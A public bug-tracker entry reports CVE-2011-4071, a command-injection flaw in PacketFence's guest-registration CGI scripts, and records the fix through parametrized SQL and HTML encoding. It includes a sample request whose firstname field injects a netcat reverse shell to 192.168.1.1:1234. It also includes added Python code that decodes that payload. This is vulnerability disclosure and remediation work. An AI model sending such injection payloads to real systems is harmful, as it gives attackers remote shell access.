PacketFence
Bug Tracking System

ID: 0001295
Project: PacketFence
Category: security
View Status: public
Date Submitted: 2011-10-03 12:13
Last Update: 2011-10-24 20:17
Reporter: mattd
Assigned To: obilodeau
Priority: normal
Severity: major
Reproducibility: always
Status: closed
Resolution: fixed
Product Version: devel
Target Version: 3.0.2
Fixed in Version: 3.0.2
Summary: 0001295: Command injection in guest management and captive portal web interfaces
Description: In both the guest management (html/admin/guest-management.cgi) and captive portal (html/captive-portal/guest-selfregistration.cgi) web interfaces, shell command lines are constructed using several session parameters, which are then passed to the pf_run function for execution. However, these are not escaped, allowing an attacker to execute arbitrary commands on the system.

The existence of this vulnerability in the guest management interface would not normally be such an issue; however, the authentication bypass described in bug 1294 allows the vulnerability to be exposed by an attacker for exploitation.
Additional Information: A sample request, triggering the injection and making the server create a reverse shell to the attacker listening on 192.168.1.1:1234 (assuming netcat is installed on the server):
guest-selfregistration.cgi?mode=guest-register&by_email=1&firstname=%22%27%3bnc%20-c%27sh%202%3E%261%27%20192.168.1.1%201234%20%23&lastname=x&email=x@example.com&phone=1&aup_signed=1
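The construction the report describes, worked through as an added Python illustration (PacketFence is written in Perl; this is not the project's code). It decodes the sample request above, rebuilds a command line of the shape the payload is aimed at (a single-quoted pfcmd argument carrying double-quoted field values; the pfcmd path, the template and the argv-style "person add" grammar are assumptions for the example, not taken from the project's source), tokenises that line the way a POSIX shell would, and contrasts it with an argv-style invocation in which the values never pass through a shell.

```python
"""Shell command injection via interpolated form fields, and the argv
alternative. Added example; not PacketFence code."""
import shlex
from urllib.parse import parse_qs

PFCMD = "/usr/local/pf/bin/pfcmd"   # assumed install path for the example

# The query string from the report above, copied as given on the page.
SAMPLE_QUERY = (
    "mode=guest-register&by_email=1"
    "&firstname=%22%27%3bnc%20-c%27sh%202%3E%261%27%20192.168.1.1%201234%20%23"
    "&lastname=x&email=x@example.com&phone=1&aup_signed=1"
)


def guest_fields(query):
    """Decode the registration form the way the CGI would see it."""
    return {k: v[0] for k, v in parse_qs(query, keep_blank_values=True).items()}


def build_line_unescaped(pid, firstname, lastname, email):
    """Assumed vulnerable pattern: form values dropped straight into one
    string that a shell then parses (pf_run-style). Nothing is escaped."""
    return (f"{PFCMD} 'person add \"{pid}\" "
            f"firstname=\"{firstname}\",lastname=\"{lastname}\",email=\"{email}\"'")


def shell_commands(line):
    """Tokenise like /bin/sh and split into simple commands at ; | & && ||.
    Returns a list of argv lists; a correctly quoted line yields exactly one."""
    lexer = shlex.shlex(line, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True          # recommended with punctuation_chars
    commands, current = [], []
    for tok in lexer:                      # '#' starts a comment, as in sh
        if tok in (";", "&", "|", "&&", "||"):
            if current:
                commands.append(current)
            current = []
        else:
            current.append(tok)
    if current:
        commands.append(current)
    return commands


def safe_argv(pid, firstname, lastname, email):
    """Hardened variant: build argv, never a shell string. Each value is one
    element, so shell metacharacters in it are data. The 'person add' field
    grammar here is illustrative only; pfcmd's own parser would still be fed
    attacker data, which is why the maintainers moved to parametrized SQL."""
    return [PFCMD, "person", "add", pid,
            f"firstname={firstname},lastname={lastname},email={email}"]


def survives_shell_quoting(argv):
    """True if argv, quoted element by element, re-tokenises to the same
    single command: the property that subprocess.run(argv) gives for free."""
    return shell_commands(shlex.join(argv)) == [argv]


if __name__ == "__main__":
    f = guest_fields(SAMPLE_QUERY)
    line = build_line_unescaped(f["email"], f["firstname"], f["lastname"], f["email"])
    for cmd in shell_commands(line):       # second command is the reverse shell
        print(cmd)
    print(survives_shell_quoting(safe_argv(f["email"], f["firstname"], f["lastname"], f["email"])))
```

With the payload, the unescaped line splits into two commands: the truncated pfcmd call and `nc -csh 2>&1 192.168.1.1 1234`, with the trailing `",lastname=...` swallowed by the `#` comment. The same values in `safe_argv` stay inside one argument.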
Tags: No tags attached.
Fixed in mtn revision: 92f9741dafd035ed1617b8ebb8d6a467cb0f1edb
Attached Files: security-fix-1295-command-injection.patch (9,249 bytes), added 2011-10-13 13:44

- Relationships
related to 0001308 (closed, obilodeau): guest access by sms doesn't record firstname, lastname

- Notes
(0002342)
obilodeau (reporter)
2011-10-13 13:56

Fixed command injection by doing parametrized SQL instead of calling pfcmd person command. While I was there, I fixed a problem with SMS activation where username and lastname were not properly kept (0001308).

Some potentially dangerous characters could still be injected in the SQL-based person creation mechanism so I made sure to sanitize the output in the Web Admin to prevent XSS there:
- Converting dangerous characters into HTML entities in the Web Admin's tableprint
- Converting dangerous characters into HTML entities in the Web Admin's person edit dialog

I haven't re-validated all of the admin because it's a lot of work and most of the other areas (except person) are not directly controlled by user input or are validated.

Fix will be released in 3.0.2 shortly.

Those who can't wait or who won't upgrade in a timely fashion should apply the attached patch. It should apply cleanly on 3.0+. Users of PacketFence before version 3.0.0 are *not* affected.
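The two measures the note above describes, as an added example in Python with sqlite3 (not PacketFence's own Perl/MySQL code; the person table and its columns are assumed for the illustration): the firstname payload from the report goes in through a bound parameter and comes back out unchanged, a stored-XSS value is neutralised by entity-encoding at render time rather than at storage time, and the string-built statement that parametrization replaces is shown failing on an ordinary apostrophe.

```python
"""Parametrized person creation plus output encoding in the admin view.
Added example; not PacketFence code. Table layout is assumed."""
import html
import sqlite3

# Constructed inputs: the report's firstname payload and a stored-XSS value.
# Neither can escape a bound parameter, but both reach the browser verbatim
# unless the UI encodes them on output.
SHELL_PAYLOAD = "\"';nc -c'sh 2>&1' 192.168.1.1 1234 #"
XSS_PAYLOAD = "<script>alert(document.cookie)</script>"
COLUMNS = ("pid", "firstname", "lastname", "email")


def open_person_db():
    """In-memory stand-in for the person table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE person (pid TEXT PRIMARY KEY, firstname TEXT, "
                 "lastname TEXT, email TEXT)")
    return conn


def create_person(conn, pid, firstname, lastname, email):
    """Parametrized insert: values travel as bound parameters, never as SQL
    text, so quotes, semicolons and comment markers are stored, not parsed."""
    conn.execute("INSERT INTO person (pid, firstname, lastname, email) "
                 "VALUES (?, ?, ?, ?)", (pid, firstname, lastname, email))
    conn.commit()


def create_person_unsafe(conn, pid, firstname, lastname, email):
    """The pattern parametrization replaces: building the statement from
    strings. Returns False when the data breaks the SQL; one apostrophe
    (O'Brien) is enough, and a crafted value could do worse."""
    sql = (f"INSERT INTO person (pid, firstname, lastname, email) VALUES "
           f"('{pid}', '{firstname}', '{lastname}', '{email}')")
    try:
        conn.execute(sql)
        conn.commit()
        return True
    except sqlite3.OperationalError:
        return False


def fetch_person(conn, pid):
    row = conn.execute("SELECT pid, firstname, lastname, email FROM person "
                       "WHERE pid = ?", (pid,)).fetchone()
    return dict(zip(COLUMNS, row)) if row else None


def render_person_row(person):
    """Output encoding for the admin table: every stored field is converted
    to HTML entities when rendered (the tableprint / edit-dialog change in
    the note), so attacker-controlled names cannot inject markup or break
    out of attribute values."""
    cells = "".join(f"<td>{html.escape(person[k], quote=True)}</td>" for k in COLUMNS)
    return f"<tr>{cells}</tr>"
```

Encoding on output rather than rejecting characters on input is what lets legitimate names such as O'Brien be stored intact while still rendering safely; it is also why the note warns that the remaining admin pages need the same review.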
(0002366)
obilodeau (reporter)
2011-10-17 10:40

This vulnerability has been assigned: CVE-2011-4071.
(0002383)
obilodeau (reporter)
2011-10-24 20:15

Fix released in 3.0.2.

- Issue History
Date Modified Username Field Change
2011-10-03 12:13 mattd New Issue
2011-10-06 11:47 obilodeau Status new => assigned
2011-10-06 11:47 obilodeau Assigned To => obilodeau
2011-10-13 13:44 obilodeau File Added: security-fix-1295-command-injection.patch
2011-10-13 13:56 obilodeau mtn revision => 92f9741dafd035ed1617b8ebb8d6a467cb0f1edb
2011-10-13 13:56 obilodeau Note Added: 0002342
2011-10-13 13:56 obilodeau Status assigned => resolved
2011-10-13 13:56 obilodeau Fixed in Version => +1
2011-10-13 13:56 obilodeau Resolution open => fixed
2011-10-13 13:57 obilodeau Relationship added related to 0001308
2011-10-17 10:40 obilodeau Note Added: 0002366
2011-10-24 16:45 obilodeau View Status private => public
2011-10-24 20:15 obilodeau Target Version => 3.0.2
2011-10-24 20:15 obilodeau Note Added: 0002383
2011-10-24 20:16 obilodeau Status resolved => closed
2011-10-24 20:17 obilodeau Fixed in Version +1 => 3.0.2

